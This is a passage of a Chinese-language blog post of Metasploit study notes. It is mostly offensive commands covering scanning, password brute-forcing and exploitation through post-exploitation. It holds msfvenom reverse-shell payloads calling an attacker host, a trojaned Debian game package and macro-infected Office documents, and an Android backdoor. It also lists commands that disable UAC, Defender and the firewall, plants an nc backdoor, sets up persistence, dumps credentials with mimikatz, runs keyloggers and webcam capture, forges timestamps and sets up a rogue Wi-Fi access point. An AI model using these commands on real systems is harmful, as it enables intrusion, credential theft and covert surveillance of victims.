<li><p>扫描通过SMB管道可以访问的RCERPC服务</p>
<pre><code>use auxiliary/scanner/smb/pipe_dcerpc_auditor</code></pre></li>
<li><p>SMB共享枚举（账号、密码）</p>
<pre><code> use auxiliary/scanner/smb/smb_enumshares</code></pre></li>
<li><p>SMB用户美句（账号、密码）</p>
<pre><code> use auxiliary/scanner/smb/smb_enumusers</code></pre></li>
<li><p>SID枚举（账号、密码）</p>
<pre><code>use auxiliary/scanner/smb/smb_lookupsid</code></pre></li>
<li><p>SSH 版本扫描</p>
<pre><code>use auxiliary/scanner/ssh/ssh_version</code></pre></li>
<li><p>SSH密码爆破</p>
<pre><code>use auxiliary/scanner/ssh/ssh_login</code></pre><pre><code>set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/
root_userpass.txt ;set VERBOSE false ;run</code></pre></li>
<li><p>SSH公钥登录</p>
<pre><code>use auxiliary/scanner/ssh/ssh_login_pubkey</code></pre><pre><code>set KEY_FILE id_rsa ; set USERNAME root ;run）</code></pre></li>
</ol>
</li>
<li><p>Windows缺少的补丁</p>
<blockquote>
<p>基于已经取得的session进行检测</p>
</blockquote>
<pre><code>use post/windows/gather/enum_patches #查看目标主机的补丁信息</code></pre><pre><code>show advanced</code></pre><pre><code>set VERBOSE yes</code></pre><blockquote>
<p> 检查失败</p>
</blockquote>
<ol>
<li>Known bug in WMI query, try migrating to another process</li>
<li>迁移到另一个进程再次尝试</li>
</ol>
</li>
<li><p>MSSQL扫描端口</p>
<ol>
<li><p>TCP 1433（动态端口）/UDP 1434（查询TCP端口号）</p>
<pre><code>use auxiliary/scanner/mssql/mssql_ping</code></pre></li>
</ol>
</li>
<li><p>爆破MSSQL密码</p>
<pre><code>use auxiliary/scanner/mssql/mssql_ping</code></pre></li>
<li><p>远程执行代码</p>
<pre><code>use auxiliary/admin/mssql/mssql_exec</code></pre><pre><code>set CMD net user user pass /ADD</code></pre></li>
<li><p>FTP 版本扫描</p>
<pre><code>use auxiliary/scanner/ftp/ftp_version</code></pre><pre><code>use auxiliary/scanner/ftp/anonymous</code></pre><pre><code>use auxiliary/scanner/ftp/ftp_login</code></pre></li>
<li><p>use auxiliary/scanner/ [tab]</p>
<ol>
<li>Display all 479 possibilities? (y or n)</li>
</ol>
</li>
</ol>
<h1 id="msf——弱点扫描"><a href="#msf——弱点扫描" class="headerlink" title="msf——弱点扫描"></a>msf——弱点扫描</h1><blockquote>
<p>根据信息收集结果搜索漏洞利用模块</p>
</blockquote>
<ol>
<li><p>VNC 密码破解</p>
<pre><code>use auxiliary/scanner/vnc/vnc_login</code></pre></li>
<li><p>VNC 无密码访问</p>
<pre><code>use auxiliary/scanner/vnc/vnc_none_auth</code></pre><pre><code>supported : None, free access! </code></pre></li>
<li><p>RDP 远程桌面漏洞</p>
<ol>
<li>use auxiliary/scanner/rdp/ms12_020_check</li>
<li>检查不会造成DoS攻击</li>
</ol>
</li>
<li><p>设备后门</p>
<ol>
<li>use auxiliary/scanner/ssh/juniper_backdoor</li>
<li>use auxiliary/scanner/ssh/fortinet_backdoor</li>
</ol>
</li>
<li><p>VMWare ESXi密码爆破</p>
<ol>
<li>use auxiliary/scanner/vmware/vmauthd_login</li>
<li>use auxiliary/scanner/vmware/vmware_enum_vms</li>
</ol>
</li>
<li><p>利用WEB API远程开启虚拟机</p>
<ol>
<li>use auxiliary/admin/vmware/poweron_vm</li>
</ol>
</li>
<li><p>HTTP 弱点扫描</p>
<ol>
<li>过期证书：use auxiliary/scanner/http/cert</li>
<li>显示目录及文件<ol>
<li>use auxiliary/scanner/http/dir_listing</li>
<li>use auxiliary/scanner/http/files_dir </li>
</ol>
</li>
<li>WebDAV Unicode 编码身份验证绕过<ol>
<li>use auxiliary/scanner/http/dir_webdav_unicode_bypass</li>
<li>Tomcat 管理登录页面<ol>
<li>use auxiliary/scanner/http/tomcat_mgr_login</li>
</ol>
</li>
<li>基于HTTP方法的身份验证绕过<ol>
<li>use auxiliary/scanner/http/verb_auth_bypass</li>
</ol>
</li>
<li>Wordpress 密码爆破<ol>
<li>use auxiliary/scanner/http/wordpress_login_enum</li>
<li>set URI /wordpress/wp-login.php</li>
</ol>
</li>
<li>WMAP WEB应用扫描器<ol>
<li>根据SQLmap的工作方式开发<ol>
<li>load wmap</li>
<li>wmap_sites -a <a href="http://1.1.1.1" target="_blank" rel="noopener">http://1.1.1.1</a></li>
<li>wmap_targets -t <a href="http://1.1.1.1/mutillidae/index.php" target="_blank" rel="noopener">http://1.1.1.1/mutillidae/index.php</a></li>
<li>wmap_run -t </li>
<li>wmap_run -e</li>
<li>wmap_vulns -l </li>
<li>vulns</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
<li><p>Openvas</p>
<ol>
<li>Load openvas</li>
<li>db_import openvas.nbe </li>
<li>Nessus</li>
<li>Nexpose<ol>
<li>Xml格式日志文件</li>
</ol>
</li>
</ol>
</li>
<li><p>MSF 直接调用Nessus执行扫描</p>
<ol>
<li>Load nessus</li>
<li>nessus_help </li>
<li>nessus_connect admin:<a href="mailto:toor@1.1.1.1">toor@1.1.1.1</a></li>
<li>nessus_policy_list</li>
<li>nessus_scan_new </li>
<li>nessus_report_list</li>
</ol>
</li>
</ol>
<h1 id="msf客户端渗透"><a href="#msf客户端渗透" class="headerlink" title="msf客户端渗透"></a>msf客户端渗透</h1><ol>
<li>诱骗被害者执行payload（windows）<ol>
<li>msfvenom –payload-options -p windows/shell/reverse_tcp </li>
<li>msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp<br>LHOST=1.1.1.1 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o<br>1.exe</li>
<li>msfconsole<ol>
<li>use exploit/multi/handler</li>
<li>set payload windows/shell/reverse_tcp</li>
<li>set LHOST 1.1.1.1</li>
<li>set LPORT 4444</li>
<li>exploit</li>
</ol>
</li>
</ol>
</li>
<li>诱骗被害者执行payload（Linux deb安装包）<ol>
<li>apt-get –download-only install freesweep</li>
<li>dpkg -x freesweep_0.90-1_i386.deb free</li>
<li>mkdir free/DEBIAN &amp;&amp; cd free/DEBIAN</li>
<li>vi control</li>
<li>vi postinst<ol>
<li>#!/bin/sh </li>
<li>sudo chmod 2755 /usr/games/freesweep_scores &amp;&amp; /usr/games/<br>freesweep_scores &amp; /usr/games/freesweep &amp;</li>
</ol>
</li>
<li>msfvenom -a x86 –platform linux -p linux/x86/shell/reverse_tcp<br>LHOST=1.1.1.1 LPORT=4444 -b “\x00” -f elf -o /root/free/usr/games/<br>freesweep_scores</li>
<li>chmod 755 postinst</li>
<li>dpkg-deb –build /root/free</li>
</ol>
</li>
<li>利用Acrobat Reader漏洞执行payload<ol>
<li>构造PDF文件exploit/：windows/fileformat/adobe_utilprintf</li>
<li>构造恶意网站：exploit/windows/browser/adobe_utilprintf</li>
<li>Meterpreter<ol>
<li>use priv</li>
<li>run post/windows/capture/keylog_recorder </li>
</ol>
</li>
<li>利用Flash插件漏洞执行payload<ol>
<li>– use exploit/multi/browser/adobe_flash_hacking_team_uaf</li>
<li>use exploit/multi/browser/adobe_flash_opaque_background_uaf</li>
<li>use auxiliary/server/browser_autopwn2</li>
</ol>
</li>
<li>利用IE浏览器漏洞执行payload<ol>
<li>– use exploit/windows/browser/ms14_064_ole_code_execution</li>
</ol>
</li>
</ol>
</li>
<li>利用 JRE 漏洞执行payload<ol>
<li>use exploit/multi/browser/java_jre17_driver_manager</li>
<li>use exploit/multi/browser/java_jre17_jmxbean</li>
<li>use exploit/multi/browser/java_jre17_reflection_types</li>
</ol>
</li>
<li>生成Android后门程序<ol>
<li>use payload/android/meterpreter/reverse_tcp</li>
<li>generate -f a.apk -p android -t raw</li>
</ol>
</li>
<li>VBScript 感染方式<ol>
<li>利用宏感染word、excel文档</li>
<li>绕过某些基于文件类型检查的安全机制</li>
<li>生成vbscript脚本：msfvenom -a x86 –platform windows -p windows/<br>meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -e x86/shikata_ga_nai<br>-f vba-exe</li>
<li>Office 2007 +<ol>
<li>视图——宏——创建</li>
<li>Payload 第一部分VBA代码<br>Payload 第二部分粘入word文档正文：</li>
<li>Msf 启动侦听<ol>
<li>use exploit/multi/handler</li>
<li>set payload windows/meterpreter/reverse_tcp</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
<h1 id="msf后渗透测试"><a href="#msf后渗透测试" class="headerlink" title="msf后渗透测试"></a>msf后渗透测试</h1><blockquote>
<p>信息搜集=&gt;漏洞探测=&gt;漏洞利用=&gt;权限提升=&gt;内网渗透=&gt;后门持久化=&gt;清除痕迹</p>
<p><a href="https://www.freebuf.com/news/210292.html" target="_blank" rel="noopener">https://www.freebuf.com/news/210292.html</a></p>
</blockquote>
<p><img src="https://image.3001.net/images/20190803/1564816737_5d453561a6ff0.png!small" alt="微信图片_20190803151851.png"></p>
<h2 id="绕过UAC限制"><a href="#绕过UAC限制" class="headerlink" title="绕过UAC限制"></a>绕过UAC限制</h2><blockquote>
<h3 id="1-什么是UAC？"><a href="#1-什么是UAC？" class="headerlink" title="1.什么是UAC？"></a>1.什么是UAC？</h3><p>Microsoft的Windows Vista和Windows Server 2008操作系统引入了一种良好的用户帐户控制架构，以防止系统范围内的意外更改，这种更改是可以预见的，并且只需要很少的操作量。它是<code>Windows的一个安全功能</code>，它支持防止对操作系统进行未经授权的修改，UAC确保<code>仅在管理员授权的情况下</code>进行某些更改。如果管理员不允许更改，则不会执行这些更改，并且Windows系统保持不变。</p>
<h3 id="2-UAC如何运行？"><a href="#2-UAC如何运行？" class="headerlink" title="2.UAC如何运行？"></a>2.UAC如何运行？</h3><p>UAC通过<code>阻止程序执行任何涉及有关系统更改/特定任务的任务</code>来运行。除非尝试执行这些操作的进程以管理员权限运行，否则这些操作将无法运行。如果您以管理员身份运行程序，则它将具有更多权限，因为它将被<code>“提升权限”</code>，而不是以管理员身份运行的程序。</p>
<p>因为有的用户是没有管理员权限，没有管理员权限是运行不了哪些只能通过管理员权限才能操作的命令。比如修改注册表信息、创建用户、读取管理员账户密码、设置计划任务添加到开机启动项等操作。</p>
<p>最直接的提权命令：getsystem</p>
<p>绕过UAC防护机制的<code>前提</code>是我们首先<code>通过exploit获得目标主机的meterprter</code>。获得meterpreter会话后，输入以下命令以检查是否是system权限。在这里我就不直接演示了，直接上命令，自己多练习练习即可，所话说熟能生巧。我们需要把获取到的session保存到后台，执行background</p>
</blockquote>
<h3 id="绕过-UAC的四种方式"><a href="#绕过-UAC的四种方式" class="headerlink" title="绕过 UAC的四种方式"></a>绕过 UAC的四种方式</h3><h4 id="Windows权限提升绕过UAC保护（内存注入）"><a href="#Windows权限提升绕过UAC保护（内存注入）" class="headerlink" title="Windows权限提升绕过UAC保护（内存注入）"></a>Windows权限提升绕过UAC保护（内存注入）</h4><h4 id="通过COM处理程序劫持"><a href="#通过COM处理程序劫持" class="headerlink" title="通过COM处理程序劫持"></a>通过COM处理程序劫持</h4><h4 id="通过Eventvwr注册表项"><a href="#通过Eventvwr注册表项" class="headerlink" title="通过Eventvwr注册表项"></a>通过Eventvwr注册表项</h4><ol>
<li><p>获取system账号权限</p>
<ol>
<li><p>load priv</p>
</li>
<li><p>getsystem</p>
<ol>
<li>priv_elevate_getsystem: Operation failed: Access is denied.</li>
</ol>
</li>
<li><p>use exploit/windows/local/ask</p>
<ol>
<li>set session</li>
<li>set filename</li>
</ol>
</li>
<li><p>use exploit/windows/local/bypassuac(将通过进程注入使用可信任发布者证书绕过Windows UAC。它将生成关闭UAC标志的第二个shell。)</p>
</li>
<li><p>use exploit/windows/local/bypassuac_injection</p>
<ol>
<li>set session</li>
<li>set payload</li>
</ol>
</li>
</ol>
</li>
<li><p>利用漏洞直接提权为system</p>
<ol>
<li>use exploit/windows/local/ms13_053_schlamperei</li>
<li>use exploit/windows/local/ms13_081_track_popup_menu</li>
<li>use exploit/windows/local/ms13_097_ie_registry_symlink</li>
<li>use exploit/windows/local/ppr_flatten_rec</li>
</ol>
</li>
<li><p>图形化payload</p>
<ol>
<li>set payload windows/vncinject/reverse_tcp</li>
<li>set viewonly no 可操作</li>
</ol>
</li>
<li><p>Psexec 模块之 Passthehash</p>
<ol>
<li>use exploit/windows/smb/psexec</li>
<li>set smbpass hash</li>
<li>需要提前关闭 UAC<ol>
<li>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft<br>\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f </li>
<li>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft<br>\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f</li>
<li>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft<br>\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t<br>REG_DWORD /d 1 /f </li>
<li>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft<br>\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t<br>REG_DWORD /d 1 /f</li>
</ol>
</li>
</ol>
</li>
<li><p>关闭 windows防火墙</p>
<ol>
<li>需要管理员或system权限</li>
<li>netsh advfirewall set allprofiles state on </li>
</ol>
</li>
<li><p>关闭 Windefend</p>
<ol>
<li>net stop windefend</li>
</ol>
</li>
<li><p>Bitlocker 磁盘加密</p>
<ol>
<li>manage-bde -off C:</li>
<li>manage-bde -status C:</li>
</ol>
</li>
<li><p>关闭DEP</p>
<ol>
<li>bcdedit.exe /set {current} nx AlwaysOff</li>
</ol>
</li>
<li><p>杀死防病毒软件（meterpreter）</p>
<ol>
<li>Run killav</li>
<li>run post/windows/manage/killav（关闭杀毒软件）</li>
</ol>
</li>
<li><p>开启远程桌面服务</p>
<ol>
<li>run post/windows/manage/enable_rdp（开启远程桌面）</li>
<li>run getgui –e（开启远程桌面）<ol>
<li>run getgui -u yuanfh -p pass</li>
<li>Run getgui -u cmdback -p 123123  //添加用户</li>
<li>Run getgui -f 4446 -e //将目标主机上面的3389端口转发到4446</li>
<li>netsh advfirewall set allprofiles state off //关闭防火墙</li>
<li>run multi_console_command -rc /root/.msf4/logs/scripts/getgui/<br>clean_up__20160824.1855.rc</li>
</ol>
</li>
</ol>
</li>
<li><p>查看远程桌面</p>
<ol>
<li>screenshot</li>
<li>use espia<ol>
<li>screengrab</li>
</ol>
</li>
</ol>
</li>
<li><p>Tokens</p>
</li>
<li><p>Incognito</p>
</li>
<li><p>搭建域环境</p>
</li>
<li><p>load incognito #加载incoginto功能（用来盗窃目标主机的令牌或是假冒用户)</p>
<ol>
<li><p>list_tokens -u（查看可用的tokenimpersonate_token）</p>
</li>
<li><p>list_tokens –g (列出目标主机用户组的可用令牌)</p>
</li>
<li><p>impersonate_token lab\administrator</p>
<blockquote>
<p>运行上述命令需要getsystem</p>
<p>本地普通权限用户需县本地提权</p>
<p>use exploit/windows/local/ms10_015_kitrap0d</p>
<p>execute -f cmd.exe -i -t 使用当前假冒token执行程序shell </p>
</blockquote>
</li>
</ol>
</li>
<li><p>用注册表添加NC后门服务（meterpreter）</p>
<ol>
<li>upload /usr/share/windows-binaries/nc.exe C:\windows\system32</li>
<li>reg enumkey -k HKLM\software\microsoft\windows\currentversion\run</li>
<li>reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc<br>-d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’（设置键值）</li>
<li>reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -<br>v nc（攻击者连接nc后门）</li>
</ol>
</li>
<li><p>打开防火墙端口（meterpreter）</p>
<ol>
<li>execute -f cmd -i -H</li>
<li>netsh firewall show opmode</li>
<li>netsh firewall add portopening TCP 4444 “test” ENABLE ALL</li>
<li>shutdown -r -t 0</li>
<li>nc 1.1.1.1 4444</li>
</ol>
</li>
<li><p>其他注册表项</p>
<ol>
<li><a href="https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart" target="_blank" rel="noopener">https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart</a></li>
</ol>
</li>
<li><p>抓包（meterpreter）</p>
<ol>
<li>load sniffer</li>
<li>sniffer_interfaces（查看网卡）</li>
<li>sniffer_start 2（选择网卡 开始抓包）</li>
<li>sniffer_dump 2 1.cap / sniffer_dump 2 1.cap（导出pcap数据包）</li>
<li>在内存中缓存区块循环存储抓包（50000包），不写硬盘</li>
<li>智能过滤meterpreter流量，传输全程使用SSL/TLS加密</li>
</ol>
</li>
<li><p>解码</p>
<ol>
<li>use auxiliary/sniffer/psnuffle</li>
<li>set PCAPFILE 1.cap</li>
</ol>
</li>
<li><p>搜索文件</p>
<ol>
<li>search -f *.ini</li>
<li>search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx</li>
</ol>
</li>
<li><p>John the Ripper破解弱口令</p>
<ol>
<li>use post/windows/gather/hashdump #system权限的meterpreter</li>
<li>Run #结果保存在/tmp目录中</li>
<li>use auxiliary/analyze/jtr_crack_fast</li>
<li>run </li>
</ol>
</li>
<li><p>文件系统访问会留下痕迹，电子取整重点关注</p>
</li>
<li><p>渗透测试和攻击者往往希望销毁文件系统访问痕迹</p>
</li>
<li><p>最好的避免被电子取整发现的方法：不要碰文件系统</p>
<ol>
<li>meterpreter的先天优势所在（完全基于内存）</li>
</ol>
</li>
<li><p>MAC时间（modified/accessed/changed）<br>– ls -l –time=atime/mtime/ctime 1.txt<br>– stat 1.txt<br>– touch -d “2 days ago” 1.txt<br>– touch -t 1501010101 1.txt</p>
</li>
<li><p>MACE :MFT entry</p>
<ol>
<li><p>MFT：NTFS 文件系统 的主文件分配表 Master FileTable</p>
</li>
<li><p>通常1024字节或 2个硬盘扇区， 其中存放多想entry 信息</p>
</li>
<li><p>包含文件大量信息（大小名称 目录位置 磁盘位置 创建日期）</p>
</li>
<li><p>文件系统取整分析技术</p>
<blockquote>
<p>伪造时间戳</p>
</blockquote>
<ol>
<li>Timestomp (meterpreter)<br>– timestomp -v 1.txt<br>– timestomp -f c:\autoexec.bat 1.txt<br>– -b -r # 擦除MACE时间信息，<strong>目前此参数功能失效</strong><br>– -m / -a / -c / -e / -z<br>– timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt</li>
</ol>
</li>
</ol>
</li>
<li><p>pivoting跳板/枢纽/支点</p>
</li>
<li><p>pivoting——端口转发portfwd</p>
<ol>
<li>利用已经被控计算机，在kali与攻击目标之间实现端口转发<br>– portfwd add -L LIP -l LPORT -r RIP -p RPORT<br>– portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389<br>– portfwd list / delete / flush</li>
<li>use exploit/windows/smb/ms08_067_netapi<br>– set RHOST 127.0.0.1<br>– set LHOST 2.1.1.10</li>
<li>use exploit/multi/handler<br>– set exitonsession false</li>
</ol>
</li>
<li><p>POST 模块<br>– run post/windows/gather/arp_scanner RHOSTS=2.1.1.0/24<br>– run post/windows/gather/checkvm （查看目标主机是否为虚机）<br>– run post/windows/gather/credentials/credential_collector<br>– run post/windows/gather/enum_applications （获取目标主机安装软件信息）</p>
<p>run post/windows/manage/enable_rdp（开启3389远程桌面）</p>
<p>run post/windows/gather/enum_domain  （查找目标主机域控）</p>
<p>– run post/windows/gather/enum_logged_on_users （列举当前登陆过主机的用户）</p>
<p> run post/windows/gather/credentials/windows_autologin（抓取自动登陆的用户名和密码）</p>
<p>run post/windows/manage/enable_rdp username=xxx password=xxx //添加远程桌面的用户(同时也会将该用户添加到管理员组) </p>
<p>run post/windows/gather/enum_chrome //获取谷歌缓存</p>
<p>run post/windows/gather/enum_firefox //获取火狐缓存</p>
<p>run post/windows/gather/enum_ie  //获取IE缓存</p>
<p>– run post/windows/gather/enum_snmp<br>– run post/multi/recon/local_exploit_suggester<br>– run post/windows/manage/delete_user USERNAME=yuanfh<br>– run post/multi/gather/env<br>– run post/multi/gather/firefox_creds<br>– run post/multi/gather/ssh_creds<br>– run post/multi/gather/check_malware REMOTEFILE=c:\a.exe</p>
</li>
<li><p>自动执行meterpreter脚本<br>– set AutoRunScript hostsedit -e 1.1.1.1,<a href="http://www.baidu.com" target="_blank" rel="noopener">www.baidu.com</a><br>– set InitialAutoRunScript checkvm<br>▪ 自动执行 post 模块<br>– set InitialAutoRunScript migrate -n explorer.exe<br>– set AutoRunScript post/windows/gather/dumplinks</p>
</li>
<li><p>摄像头</p>
<p>Webscan_list    //查看摄像头列表；</p>
<p>Webscan_stream   //摄像头视频获取；</p>
<p>Webscan_chat    //查看摄像头接口</p>
</li>
<li><p>键盘记录</p>
<p>keyscan_start   //开启键盘记录功能</p>
<p>keyscan_dump   //显示捕捉到的键盘记录信息</p>
<p>keyscan_stop   //停止键盘记录功能</p>
</li>
<li><p>持久后门</p>
<ol>
<li>利用漏洞取得的meterpreter shell 云星宇内存中，重启失效</li>
<li>重复exploit 漏洞可能造成服务崩溃</li>
<li>持久后门保证漏洞修复后仍可远程控制</li>
<li>run persistence -h（查看帮助）</li>
<li>run persistence -X -i 10 -p 4444 -r 1.1.1.1-X（指定启动的方式为开机自启动，-i反向连接的时间间隔(10s) –r 指定攻击者的ip）</li>
<li>run persistence -U -i 20 -p 4444 -r 1.1.1.1（-U：设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数）</li>
<li>run persistence -S -i 20 -p 4444 -r 1.1.1.1</li>
</ol>
</li>
<li><p>Meterpreter 后门</p>
<ol>
<li><p>run metsvc -A(自动安装后门)  删除 -r</p>
<pre><code>use exploit/multi/handler（连接）

set PAYLOAD windows/metsvc_bind_tcp

set LPORT 31337

set RHOST 1.1.1.1</code></pre></li>
</ol>
</li>
<li><p>MSF 延伸之—— Mimikatz</p>
</li>
<li><p>hashdump ֵ使用的就是Mimikatz的部分功能<br>– getsystem<br>– load mimikatz（加载mimikatz，用于抓取密码，不限于明文密码和hash值）</p>
<p>Run hashdump （获取用户密码hash值）</p>
<p>– wdigest （读取内存中存放的账号密码明文信息）、kerberos 、msv（获取的是hash值） 、ssp （获取的是明文信息）、tspkg 、livessp<br>– mimikatz_command -h<br>– mimikatz_command -f a::<br>– mimikatz_command -f samdump::hashes（获取用户hash）<br>– mimikatz_command -f handle::list（列出应用进程）<br>– mimikatz_command -f service::list<br>– mimikatz_command -f crypto::listProviders<br>– mimikatz_command -f winmine::infos</p>
</li>
<li><p>PHP shell<br>– msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f<br>raw -o a.php<br>– MSF 启动侦听<br>– 上传到web 站点并通过浏览器访问</p>
</li>
<li><p>Web Delivery<br>– 利用代码执行漏洞访问攻击者服务器<br>– use exploit/multi/script/web_delivery<br>– set target 1<br>– php -d allow_url_fopen=true -r “eval(file_get_contents(‘<a href="http://1.1.1.1/" target="_blank" rel="noopener">http://1.1.1.1/</a><br>fTYWqmu’));”</p>
</li>
<li><p>RFI 远程文件包含<br>– vi /etc/php5/cgi/php.ini #php info 配置文件<br>▪ allow_url_fopen = On<br>▪ allow_url_include = On<br>– use exploit/unix/webapp/php_include<br>– set RHOST 1.1.1.2<br>– set PATH /dvwa/vulnerabilities/fi/<br>– set PHPURI /?page=XXpathXX<br>– set HEADERS “Cookie:security=low;<br>PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”<br>– set payload php/meterpreter/reverse_tcp<br>– set lhost 1.1.1.1<br>– exploit</p>
</li>
<li><p>Karmetasploit<br>– ։伪造AP、嗅探密码、截获数据、浏览器攻击<br>– wget <a href="https://www.offensive-security.com/wp-content/uploads/2015/04/" target="_blank" rel="noopener">https://www.offensive-security.com/wp-content/uploads/2015/04/</a><br>karma.rc_.txt<br>▪安装其他依赖包<br>– gem install activerecord sqlite3-ruby</p>
</li>
<li><p>基础架构安装配置<br>– apt-get install isc-dhcp-server<br>– cat /etc/dhcp/dhcpd.conf<br>option domain-name-servers 10.0.0.1;<br>default-lease-time 60;<br>max-lease-time 72;<br>ddns-update-style none;<br>authoritative;<br>log-facility local7;<br>subnet 10.0.0.0 netmask 255.255.255.0 {<br>range 10.0.0.100 10.0.0.254;<br>option routers 10.0.0.1;<br> option domain-name-servers 10.0.0.1;<br>}</p>
</li>
<li><p>։伪造AP<br>– airmon-ng start wlan0<br>– airbase-ng -P -C 30 -e “FREE” -v wlan0mon<br>– ifconfig at0 up 10.0.0.1 netmask 255.255.255.0<br>– touch /var/lib/dhcp/dhcpd.leases<br>– dhcpd -cf /etc/dhcp/dhcpd.conf at0<br> ▪启动Karmetasploit<br>– msfconsole -q -r karma.rc_.txt </p>
</li>
<li><p>允许用户正常上网<br>– vi karma.rc_.txt<br>– 删除setg ݇参数<br>–增加browser_autopwn2等其他模块<br>– 检查恶意流量：auxiliary/vsploit/malware/dns*<br> ۖ▪Karmetasploit<br>– msfconsole -q -r karma.rc_.txt<br> ▪添加路由和防火墙规则<br>– echo 1 &gt; /proc/sys/net/ipv4/ip_forward<br>– iptables -P FORWARD ACCEPT<br>– iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE</p>
</li>
</ol>
<h1 id="Armitage-图形化前端"><a href="#Armitage-图形化前端" class="headerlink" title="Armitage 图形化前端"></a>Armitage 图形化前端</h1><ol>
<li><p>启动方</p>
<pre><code>service postgresql start</code></pre></li>
<li><p>发现主机(不写进博客)<br>– 手动添加IP地址<br>– 扫描结果（nmap、nessus、openvas、appscan、nexpose、awvs）<br>– 直接（扫描发现nmap、msf）<br>– DNS 枚举发现<br>▪扫描端口及服务</p>
<p>工作区܄ workspace<br>–个人视角的目标动态显示筛选，同一team的队员自定义工作区<br>– 基于地址的工作区划分</p>
<p>– 基于端口的工作区划分<br>– 基于操作系统的工作区划分<br>–基于标签的工作区划分<br>▪生成payload</p>
<p>▪主动获取目标<br>– Ms08_067<br>▪被动获取目标<br>– Browser_autopwn2<br>▪ Meterpreter shell 能力展示<br>▪菜单功能<br>▪ Cortana脚本<br>– Veil-Evasionғ/use/share/veil-evasion/tools/cortana/veil_evasion.cna<br>– <a href="https://github.com/rsmudge/cortana-scripts" target="_blank" rel="noopener">https://github.com/rsmudge/cortana-scripts</a></p>
<p><img src="C:%5CUsers%5CRESCUER%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20201107225237451.png" alt="image-20201107225237451"></p>
</li>
</ol>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">YeOrLuOp</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wang468.github.io/2020/10/29/msf/">https://wang468.github.io/2020/10/29/msf/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">YeOrLuOp</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%B7%A5%E5%85%B7/">
                                    <span class="chip bg-color">工具</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2020/10/29/python/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/4.jpg" class="responsive-img" alt="Python">
                        
                        <span class="card-title">Python</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-10-29
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Python/" class="post-category">
                                    Python
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/10/29/crsf/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/10.jpg" class="responsive-img" alt="crsf">
                        
                        <span class="card-title">crsf</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
